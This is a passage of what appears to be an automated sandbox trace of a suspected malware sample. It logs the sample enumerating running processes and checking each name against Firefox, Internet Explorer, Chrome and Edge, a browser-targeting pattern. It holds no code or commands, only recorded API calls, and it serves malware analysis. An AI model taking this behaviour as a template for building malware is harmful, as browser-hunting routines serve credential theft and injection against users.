szExeFile="svchost.exe")) returned 1 [0183.395] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0183.395] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0183.395] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0183.395] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.396] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.396] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0183.396] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0183.396] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0183.396] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.396] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.397] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0183.397] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0183.397] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0183.397] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.397] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.397] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0183.397] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0183.397] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0183.397] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.397] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0183.398] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0183.398] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0183.398] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0183.398] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.398] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.398] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0183.398] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0183.398] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0183.398] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.398] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.399] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0183.399] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0183.399] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0183.399] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.399] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0183.399] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0183.399] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0183.399] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0183.399] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.399] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0183.400] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0183.400] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0183.400] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0183.400] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.400] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0183.400] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0183.400] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0183.401] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0183.401] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.401] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.401] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0183.401] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0183.401] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0183.401] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.401] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0183.402] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0183.402] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0183.402] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0183.402] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.402] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0183.402] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0183.402] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0183.402] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0183.402] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.402] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0183.403] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0183.403] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0183.403] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0183.403] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.403] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0183.403] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0183.403] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0183.403] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0183.403] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.403] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0183.404] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0183.404] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0183.404] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0183.404] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.404] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0183.405] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0183.405] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0183.405] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0183.405] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.405] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0183.405] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0183.405] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0183.405] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0183.405] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.405] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0183.406] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0183.406] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0183.406] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0183.406] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.406] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0183.406] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0183.406] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0183.406] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0183.406] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.406] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0183.407] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0183.407] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0183.407] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0183.407] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.407] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0183.407] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0183.407] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0183.407] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0183.407] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.407] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0183.408] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0183.408] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0183.408] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0183.408] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.408] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0183.408] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0183.408] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0183.409] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0183.409] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.409] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0183.409] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0183.409] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0183.409] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0183.409] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.409] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0183.410] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0183.410] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0183.410] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0183.410] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.410] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0183.410] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0183.410] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0183.410] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0183.410] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.410] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0183.411] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0183.411] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0183.411] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0183.411] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.411] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0183.411] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0183.411] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0183.411] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0183.411] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.411] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0183.412] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0183.412] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0183.412] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0183.412] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.412] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0183.412] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0183.412] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0183.412] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0183.413] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.413] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0183.413] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0183.413] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0183.413] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0183.413] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.413] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0183.414] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0183.414] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0183.414] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0183.414] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.414] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0183.414] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0183.414] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0183.414] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0183.414] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.414] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.415] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0183.415] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0183.415] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0183.415] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.415] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0183.415] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0183.415] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0183.415] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0183.415] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.415] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.416] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0183.416] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0183.416] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0183.416] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.416] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0183.416] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0183.416] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0183.417] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0183.417] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.417] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.417] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0183.417] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0183.417] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0183.417] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.417] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0183.418] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0183.418] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0183.418] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0183.418] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.418] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0183.418] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0183.418] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0183.418] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0183.418] lstrcmpiA 